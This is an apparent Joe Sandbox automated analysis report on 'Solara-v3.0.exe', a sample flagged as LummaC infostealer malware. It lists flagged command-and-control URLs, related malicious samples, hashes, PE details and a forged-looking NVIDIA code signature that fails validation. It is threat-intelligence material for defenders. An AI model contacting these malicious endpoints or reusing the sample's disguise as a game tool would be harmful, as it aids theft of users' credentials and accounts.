                                                                                                              https://steam.tv/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://lev-tolstoi.com/apiinhpmnjffcofjonbfbgaocSolara-v3.0.exe, 00000004.00000003.2257643086.000000000336F000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279754011.000000000336A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000002.3287461223.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://scentniej.buzz/api0Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  http://www.entrust.net/rpa03Solara-v3.0.exefalse
                                                                                                                    high
                                                                                                                    https://lev-tolstoi.com/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2880061716.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279860788.0000000003388000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://store.steampowered.com/privacy_agreement/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.comSolara-v3.0.exe, 00000004.00000003.2094435929.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://store.steampowered.com/points/shop/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://ocsp.rootca1.amazontrust.com0:Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://sketchfab.comSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.ecosia.org/newtab/Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://lv.queniujq.cnSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSolara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.youtube.com/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://store.steampowered.com/privacy_agreement/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engSolara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.google.com/recaptcha/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://checkout.steampowered.com/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://inherineau.buzz/apiSolara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          https://appliacnesot.buzz/apiSolara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          http://crl.entrust.net/2048ca.crl0Solara-v3.0.exefalse
                                                                                                                                                            high
                                                                                                                                                            https://lev-tolstoi.com/apiifaf)Solara-v3.0.exe, 00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            https://store.steampowered.com/;Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.entrust.net/rpa0Solara-v3.0.exefalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/about/Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/my/wishlist/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://cashfuzysao.buzz/apiBSolara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    unknown
                                                                                                                                                                    https://lev-tolstoi.coSolara-v3.0.exe, 00000004.00000003.2220043538.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2215763251.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193850105.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2219935945.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193758527.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://ocsp.entrust.net03Solara-v3.0.exefalse
                                                                                                                                                                        high
                                                                                                                                                                        http://ocsp.entrust.net02Solara-v3.0.exefalse
                                                                                                                                                                          high
                                                                                                                                                                          https://help.steampowered.com/en/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/market/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/news/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581538
Start date and time: 2024-12-28 02:54:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Solara-v3.0.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/1@11/2
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 62
• Number of non-executed functions: 169
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Solara-v3.0.exe, PID 6568 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
20:54:55 | API Interceptor | 11x Sleep call for process: Solara-v3.0.exe modified
                                                                                                                                                                                                                                            IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            steamcommunity.comScript.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.121.10.34
                                                                                                                                                                                                                                            SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.121.10.34
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            AKAMAI-ASN1EUScript.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            CLOUDFLARENETUSScript.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            48.252.190.9.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.21.95.219
                                                                                                                                                                                                                                            https://haleborealis.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.22.72.81
                                                                                                                                                                                                                                            External2.4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.29.252
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            soft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.30.13
                                                                                                                                                                                                                                            https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 172.67.216.74
                                                                                                                                                                                                                                            New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.92.91
                                                                                                                                                                                                                                            WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.30.13
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            External2.4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14402
                                                                                                                                                                                                                                            Entropy (8bit):4.874636730022465
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
                                                                                                                                                                                                                                            MD5:DF0EFD0545733561C6E165770FB3661C
                                                                                                                                                                                                                                            SHA1:0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
                                                                                                                                                                                                                                            SHA-256:A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
                                                                                                                                                                                                                                            SHA-512:3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                            Preview:AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B
                                                                                                                                                                                                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.565396215180505
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                            File name:Solara-v3.0.exe
                                                                                                                                                                                                                                            File size:567'848 bytes
                                                                                                                                                                                                                                            MD5:ac461b5d5ac030c7cc5c2f48efc44668
                                                                                                                                                                                                                                            SHA1:86ed7c32e2539962ad29e046775025d9ec6ffdd6
                                                                                                                                                                                                                                            SHA256:65f1f08a9fbd495e5544503df844e89d6ea7fdcad4a5cb56236fc10b624173be
                                                                                                                                                                                                                                            SHA512:fb405b748b7f0796e4827a569c4d3af12a33c21c1dd2d7ba678256d53766ca0c57da70197b451173c0706ec21d0108dc25499263cae3d09afb6ad747027f82fc
                                                                                                                                                                                                                                            SSDEEP:12288:yYO6Dqzihouxpa+yWTKbuQ4bUJRNds4bYgCJPEO:zO6DThou2+yDbZkUJ3dsuIPt
                                                                                                                                                                                                                                            TLSH:0DC4E1527691C0B2C5531A764A75D7795A3EFC200F22AAC793984BFDDEB02C14F31A2E
                                                                                                                                                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@..................................o....@.................................|j..<..
                                                                                                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                            Entrypoint:0x4104a0
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            Subsystem:windows cui
                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:96d90e8808da099bc17e050394f447e7
                                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                            Error Number:-2146869232
Not Before:12/01/2023 19:00:00
Not After:16/01/2026 18:59:59
                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                            • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                            Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                                                                                                                            Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                                                                                                                            Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                                                                                                                            Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                                                                                                                                                            Instruction
